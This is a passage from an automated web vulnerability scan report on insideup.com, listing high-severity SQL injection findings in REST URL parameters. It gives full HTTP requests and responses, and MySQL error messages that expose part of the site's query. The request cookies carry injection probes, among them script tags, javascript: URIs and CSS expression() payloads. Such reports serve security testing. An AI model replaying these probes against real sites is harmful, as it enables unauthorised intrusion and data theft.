s the first time&attributeId_392=1924__Yes&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30009&website=n/a&zip=Zip code'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'leadflow/deco00/project.php?catId=30009&iusrc=iupsc&address=Address&attributeId_' at line 5

Request 2

GET /ppc/leadflow/deco00/project.php?catId=30009&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_387=1892__Collect+from+businesses+only&attributeId_388=1896__%24500+-+1%2c000&attributeId_389=1905__1&attributeId_390=1912__Less+than+2+months&attributeId_391=1919__This+is+the+first+time&attributeId_392=1924__Yes&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30009&website=n%2fa&zip=Zip+code'' HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/deco00/project.php?catId=30009&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=7DCBAF96E588A764816BB2D777B6D36B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:58:29 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=b785s2bacek8dn6a1unovgm6t1; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 17345


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.231. http://www.insideup.com/ppc/leadflow/deco00/project_dynamic_page_updated.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/deco00/project_dynamic_page_updated.php

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

POST /ppc/leadflow'/deco00/project_dynamic_page_updated.php?catId=30009&group=deco00&template=3 HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/deco00/project.php?catId=30009&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Content-Length: 564

subcategoryId=30009&catId=30009&iusrc=iupsc+&attributeId_387=1894__Collect+from+both+businesses+and+individual+consumers&attributeId_388=1903__%241%2c000%2c000%2b&attributeId_389=1910__50%2b&attribute
...[SNIP]...

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:35:06 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=cisdc30msi4elblfrmr8bfama3; path=/
Content-Length: 2486
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
leadflow'/deco00/project_dynamic_page_updated.php?catId=30009&group=deco00&template=3' OR prj.project_page_url = 'leadflow'/deco00/project_dynamic_page_updated.php?catId=30009&group=deco00&template=3/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=30009&group=deco00&template=3' OR prj.project_page_url = 'leadflow'/deco0' at line 5

Request 2

POST /ppc/leadflow''/deco00/project_dynamic_page_updated.php?catId=30009&group=deco00&template=3 HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/deco00/project.php?catId=30009&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Content-Length: 564

subcategoryId=30009&catId=30009&iusrc=iupsc+&attributeId_387=1894__Collect+from+both+businesses+and+individual+consumers&attributeId_388=1903__%241%2c000%2c000%2b&attributeId_389=1910__50%2b&attribute
...[SNIP]...

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:35:07 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=21vtg24d664ee2sv3vtkk4agb5; path=/
Content-Length: 20
Connection: close
Content-Type: text/html; charset=UTF-8

Too many connections

1.232. http://www.insideup.com/ppc/leadflow/deco00/project_dynamic_page_updated.php [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/deco00/project_dynamic_page_updated.php

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

POST /ppc/leadflow/deco00'/project_dynamic_page_updated.php?catId=30009&group=deco00&template=3 HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/deco00/project.php?catId=30009&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Content-Length: 564

subcategoryId=30009&catId=30009&iusrc=iupsc+&attributeId_387=1894__Collect+from+both+businesses+and+individual+consumers&attributeId_388=1903__%241%2c000%2c000%2b&attributeId_389=1910__50%2b&attribute
...[SNIP]...

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:35:09 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=ciacrvi5brg26je34ocgf506p7; path=/
Content-Length: 2486
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
leadflow/deco00'/project_dynamic_page_updated.php?catId=30009&group=deco00&template=3' OR prj.project_page_url = 'leadflow/deco00'/project_dynamic_page_updated.php?catId=30009&group=deco00&template=3/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=30009&group=deco00&template=3' OR prj.project_page_url = 'leadflow/deco00' at line 5

Request 2

POST /ppc/leadflow/deco00''/project_dynamic_page_updated.php?catId=30009&group=deco00&template=3 HTTP/1.1
